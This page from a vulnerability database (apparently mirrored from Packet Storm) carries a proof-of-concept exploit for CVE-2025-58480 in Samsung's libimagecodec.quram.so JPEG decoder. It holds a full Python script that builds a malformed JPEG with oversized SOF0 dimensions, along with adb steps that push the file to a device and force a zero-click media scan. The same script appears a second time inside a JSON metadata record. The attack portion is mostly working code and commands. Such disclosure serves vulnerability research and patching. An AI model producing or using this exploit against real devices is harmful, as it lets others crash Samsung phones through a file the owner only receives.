📄 Samsung libimagecodec.quram.so Buffer Overflow / Denial of Service

7.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Description

This proof of concept demonstrates a denial of service vulnerability in Samsung's libimagecodec.quram.so JPEG decoder. By crafting a structurally valid JPEG file with maliciously large image dimensions height 65535, width 2862 in the SOF0 marker, the...

Visit Original Source

Basic Information

ID PACKETSTORM:214567

Published Jan 29, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Samsung libimagecodec.quram.so Malformed JPEG Triggers Buffer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.samsung.com/us/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213368/ & CVE-2025-58480

[+] Summary : This proof-of-concept demonstrates a denial-of-service vulnerability in Samsung’s libimagecodec.quram.so JPEG decoder.
By crafting a structurally valid JPEG file with maliciously large image dimensions (height 65535, width 2862) in the SOF0 marker,
the decoder performs unsafe size calculations during image parsing. This can lead to integer overflow or incorrect memory allocation,
resulting in a crash when the image is processed by Samsung Gallery or background services such as IPservice.
The PoC relies on minimal scan data and standard JPEG markers to pass initial validation, triggering the failure
before full decoding occurs. The impact is a crash (DoS); no remote code execution is demonstrated.

[+] Testing steps :

# 1. Create a PoC file : python3 poc_cve_2025_58480.py poc.jpg

# 2. Move it to the target machine : adb push poc.jpg /storage/emulated/0/DCIM/

# 3. Run a media scan (for 0-click exploits)

adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/DCIM/poc.jpg

# 4. Monitor the logs (to see the cracking)
adb logcat | grep -E "(SIGSEGV|libimagecodec|FATAL)"

[+] POC :

#!/usr/bin/env python3

import struct
import sys

def create_malformed_jpeg(output_path):

soi = b'\xFF\xD8'

app0 = b'\xFF\xE0' + struct.pack('>H', 16) + b'JFIF\x00\x01\x01\x00\x00\x01'

dqt_data = b''
for i in range(2):
dqt_data += b'\xFF\xDB' + struct.pack('>H', 67)
dqt_data += bytes([i])

dqt_data += bytes([1]) * 64

dht = (b'\xFF\xC4' + struct.pack('>H', 29) +
b'\x00' + # Table ID (0 for DC luminance)
b'\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + # BITS
b'\x00' + # HUFFVAL (minimal)
b'\xFF\xC4' + struct.pack('>H', 29) +
b'\x10' + # Table ID (16 for AC chrominance)
b'\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +
b'\x00')

height = 65535
width = 2862

sof0 = (b'\xFF\xC0' +
struct.pack('>H', 17) +
b'\x08' +
struct.pack('>H', height) +
struct.pack('>H', width) +
b'\x03' +

b'\x01' +
b'\x11' +
b'\x00' +

b'\x02' +
b'\x11' +
b'\x01' +

b'\x03' +
b'\x11' +
b'\x01')

sos = (b'\xFF\xDA' + struct.pack('>H', 12) +
b'\x03' +
b'\x01\x00' +
b'\x02\x11' +
b'\x03\x11' +
b'\x00\x3F\x00')

compressed_data = b''

for _ in range(10):

compressed_data += b'\xA0'

compressed_data += b'\x00'

eoi = b'\xFF\xD9'

jpeg_data = (soi + app0 + dqt_data + dht + sof0 + sos +
compressed_data + eoi)

with open(output_path, 'wb') as f:
f.write(jpeg_data)

print(f"[+] Malformed JPEG created: {output_path}")
print(f"[+] Dimensions: {width} x {height}")
print(f"[+] File size: {len(jpeg_data)} bytes")
print("[+] Expected behavior: Crash in libimagecodec.quram.so")
return True

def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <output_file.jpg>")
sys.exit(1)

output_file = sys.argv[1]

if not output_file.lower().endswith(('.jpg', '.jpeg')):
print("[!] Warning: Output file should have .jpg or .jpeg extension")

try:
create_malformed_jpeg(output_file)
print("\n[+] PoC created successfully.")
print("[+] To test on Samsung Galaxy S24 Ultra (One UI 8.0):")
print(" 1. adb push poc.jpg /storage/emulated/0/DCIM/")
print(" 2. adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/DCIM/poc.jpg")
print(" 3. Open in Samsung Gallery or wait for IPservice to process")

except Exception as e:
print(f"[-] Error creating PoC: {e}")
sys.exit(1)

if __name__ == "__main__":
main()

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

{
    "lastseen": "2026-01-29T16:31:00",
    "description": "This proof of concept demonstrates a denial of service vulnerability in Samsung's libimagecodec.quram.so JPEG decoder. By crafting a structurally valid JPEG file with maliciously large image dimensions height 65535, width 2862 in the SOF0 marker, the...",
    "published": "2026-01-29T00:00:00",
    "modified": "2026-01-29T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow / Denial of Service",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214567",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-58480"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Samsung libimagecodec.quram.so Malformed JPEG Triggers Buffer Overflow                                                      |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.samsung.com/us/                                                                                                 |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/213368/ & CVE-2025-58480\n    \n    [+] Summary    : This proof-of-concept demonstrates a denial-of-service vulnerability in Samsung\u2019s libimagecodec.quram.so JPEG decoder. \n                     By crafting a structurally valid JPEG file with maliciously large image dimensions (height 65535, width 2862) in the SOF0 marker, \n    \t\t\t\t the decoder performs unsafe size calculations during image parsing. This can lead to integer overflow or incorrect memory allocation, \n    \t\t\t\t resulting in a crash when the image is processed by Samsung Gallery or background services such as IPservice. \n                     The PoC relies on minimal scan data and standard JPEG markers to pass initial validation, triggering the failure \n    \t\t\t\t before full decoding occurs. The impact is a crash (DoS); no remote code execution is demonstrated.\n    \n    [+] Testing steps :\n    \n    # 1. Create a PoC file : python3 poc_cve_2025_58480.py poc.jpg\n    \n    # 2. Move it to the target machine : adb push poc.jpg /storage/emulated/0/DCIM/\n    \n    # 3. Run a media scan (for 0-click exploits)\n    \n    adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/DCIM/poc.jpg\n    \n    # 4. Monitor the logs (to see the cracking)\n    adb logcat | grep -E \"(SIGSEGV|libimagecodec|FATAL)\"\n    \n    [+] POC :\n    \n    #!/usr/bin/env python3\n    \n    import struct\n    import sys\n    \n    def create_malformed_jpeg(output_path):\n    \n        soi = b'\\xFF\\xD8'\n    \n        app0 = b'\\xFF\\xE0' + struct.pack('>H', 16) + b'JFIF\\x00\\x01\\x01\\x00\\x00\\x01'\n    \n        dqt_data = b''\n        for i in range(2):  \n            dqt_data += b'\\xFF\\xDB' + struct.pack('>H', 67)  \n            dqt_data += bytes([i])  \n    \n            dqt_data += bytes([1]) * 64\n      \n        dht = (b'\\xFF\\xC4' + struct.pack('>H', 29) + \n               b'\\x00' +  # Table ID (0 for DC luminance)\n               b'\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' +  # BITS\n               b'\\x00' +  # HUFFVAL (minimal)\n               b'\\xFF\\xC4' + struct.pack('>H', 29) + \n               b'\\x10' +  # Table ID (16 for AC chrominance)\n               b'\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \n               b'\\x00')\n    \n        height = 65535  \n        width = 2862    \n        \n        sof0 = (b'\\xFF\\xC0' +  \n                struct.pack('>H', 17) +  \n                b'\\x08' +  \n                struct.pack('>H', height) +  \n                struct.pack('>H', width) +  \n                b'\\x03' +  \n                \n           \n                b'\\x01' +  \n                b'\\x11' +  \n                b'\\x00' +  \n    \n                b'\\x02' +  \n                b'\\x11' +  \n                b'\\x01' +  \n    \n                b'\\x03' +  \n                b'\\x11' +  \n                b'\\x01')   \n    \n        sos = (b'\\xFF\\xDA' + struct.pack('>H', 12) + \n               b'\\x03' +  \n               b'\\x01\\x00' +  \n               b'\\x02\\x11' +  \n               b'\\x03\\x11' +  \n               b'\\x00\\x3F\\x00')  \n    \n        compressed_data = b''\n    \n        for _ in range(10):\n        \n            compressed_data += b'\\xA0'\n    \n            compressed_data += b'\\x00'\n    \n        eoi = b'\\xFF\\xD9'\n    \n        jpeg_data = (soi + app0 + dqt_data + dht + sof0 + sos + \n                     compressed_data + eoi)\n    \n        with open(output_path, 'wb') as f:\n            f.write(jpeg_data)\n        \n        print(f\"[+] Malformed JPEG created: {output_path}\")\n        print(f\"[+] Dimensions: {width} x {height}\")\n        print(f\"[+] File size: {len(jpeg_data)} bytes\")\n        print(\"[+] Expected behavior: Crash in libimagecodec.quram.so\")\n        return True\n    \n    def main():\n        if len(sys.argv) != 2:\n            print(f\"Usage: {sys.argv[0]} <output_file.jpg>\")\n            sys.exit(1)\n        \n        output_file = sys.argv[1]\n        \n        if not output_file.lower().endswith(('.jpg', '.jpeg')):\n            print(\"[!] Warning: Output file should have .jpg or .jpeg extension\")\n        \n        try:\n            create_malformed_jpeg(output_file)\n            print(\"\\n[+] PoC created successfully.\")\n            print(\"[+] To test on Samsung Galaxy S24 Ultra (One UI 8.0):\")\n            print(\"    1. adb push poc.jpg /storage/emulated/0/DCIM/\")\n            print(\"    2. adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/DCIM/poc.jpg\")\n            print(\"    3. Open in Samsung Gallery or wait for IPservice to process\")\n            \n        except Exception as e:\n            print(f\"[-] Error creating PoC: {e}\")\n            sys.exit(1)\n    \n    if __name__ == \"__main__\":\n        main()\n    \n    Greetings to :============================================================\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\n    ==========================================================================",
    "sourceHref": "https://packetstorm.news/download/214567",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214567/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Samsung libimagecodec.quram.so Buffer Overflow / Denial of Service_PACKETSTORM:214567

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply